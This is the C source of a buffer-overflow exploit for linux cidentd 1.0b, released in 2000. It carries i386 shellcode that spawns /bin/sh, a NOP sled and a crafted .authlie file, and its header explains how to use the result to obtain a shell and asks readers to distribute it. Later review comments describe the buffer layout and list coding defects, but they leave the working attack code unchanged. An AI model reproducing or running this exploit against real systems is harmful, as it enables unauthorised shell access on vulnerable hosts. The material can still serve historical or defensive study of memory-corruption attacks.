/*  linux cidentd 1.0b exploit I
 *  By Jackal (jackal@hack.gr) & mastoras (mastoras@hack.gr)
 *
 *  Greetz to:
 *  KoD, DiJ, m0nty, Synner, Egofan, guys at #grhack & users of hack.gr
 * 
 *  Compile it and run it in your $HOME directory. It should creat()
 *  an .authlie file. Then e.g. "telnet localhost 110", find your port
 *  by using netstat(8), "telnet localhost 113", give the ports and
 *  you're done. (test it with "id;")
 *
 *  Some code is of course stolen.
 *
 *  Oh, please distribute this :-p
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE            1060
#define NOP                            0x90

/*
 * Payload bytes that main() copies into the middle of the buffer it
 * writes to .authlie.  The escaped bytes appear to be raw i386 machine
 * code (get_sp() below is i386-only as well); they are not disassembled
 * or annotated here.  Adjacent string literals concatenate, so after the
 * escapes the array continues with "/", "/bin/sh" and the ASCII digit
 * '0' (0x30 -- the character "0", not a '\0' byte), followed by the
 * implicit NUL terminator.  None of the escapes is \x00, so
 * strlen(shellcode) in main() counts every byte up to that terminator.
 */
char shellcode[] =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";   /* literal '0' character; the NUL terminator is added by the compiler */

/*
 * Return the current stack pointer.
 *
 * i386/GCC only.  The inline asm copies %esp into %eax and the function
 * then falls off its closing brace without a return statement, relying
 * on %eax being the integer return register.  Using the value of a
 * non-void function that ends without a return is undefined behaviour in
 * C; the asm also has no output operand, so the compiler is never told
 * that %eax was written and may not preserve it under a different
 * compiler, optimisation level or target.
 */
unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");  /* AT&T syntax, 32-bit registers: i386 only */
}

/*
 * Build a buffer of `bsize` bytes and write it to ./.authlie.
 *
 * Layout produced below: the whole buffer is first filled with the
 * address (get_sp() - offset), the first half is then overwritten with
 * NOP bytes, `shellcode` is copied so that it is centred on the middle
 * of the buffer, and the final byte is set to '\0'.
 *
 * argv[1] (optional): buffer size, default DEFAULT_BUFFER_SIZE.
 * argv[2] (optional): offset subtracted from the stack pointer,
 *                     default DEFAULT_OFFSET.
 *
 * Review notes (code left as-is):
 *  - `void main` is not a conforming signature; C requires `int main`,
 *    and this function never returns an exit status on success.
 *  - atoi() reports no errors: a non-numeric, zero or negative argument
 *    is passed straight to malloc() and the loops with no range check.
 *  - strlen() is called but <string.h> is not included (see the include
 *    list at the top of the file); this relies on an implicit
 *    declaration, which C99 and later reject.
 *  - creat() is declared in <fcntl.h>, which is also not included.
 */
void main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
  int i;
  int fd;

  /* Unvalidated: atoi() yields 0 on garbage and accepts negatives. */
  if (argc > 1)
    bsize = atoi(argv[1]);
  if (argc > 2)
    offset = atoi(argv[2]);

  if (!(buff = malloc(bsize)))
    {
      printf("Can't allocate memory.\n");
      exit(0);  /* note: exit status 0 even though allocation failed */
    }
  addr = get_sp() - offset;
  /* addr is a long but %x expects unsigned int: format/argument mismatch. */
  printf("Using address: 0x%x\n", addr);

  /*
   * Fill the buffer with copies of addr.  The index advances 4 bytes per
   * iteration while addr_ptr advances sizeof(long); the two only agree
   * where long is 4 bytes.  If bsize is not a multiple of 4 the last
   * store still writes a whole long, past the end of buff.
   */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i += 4)
    *(addr_ptr++) = addr;

  /* Overwrite the first half with NOPs. */
  for (i = 0; i < bsize / 2; i++)
    buff[i] = NOP;

  /*
   * Copy the shellcode so it is centred on the midpoint of the buffer.
   * No check that strlen(shellcode) fits inside bsize; `i` is int and
   * strlen() returns size_t, so the loop compares signed to unsigned.
   */
  ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';  /* last byte is always NUL */

  /* fd is not checked for -1 and the write() result is ignored. */
  fd = creat(".authlie", 0644);
  write(fd, buff, bsize);
  close(fd);
  /* buff is never freed; it is reclaimed at process exit. */
}
/*                    www.hack.co.za              [2000]*/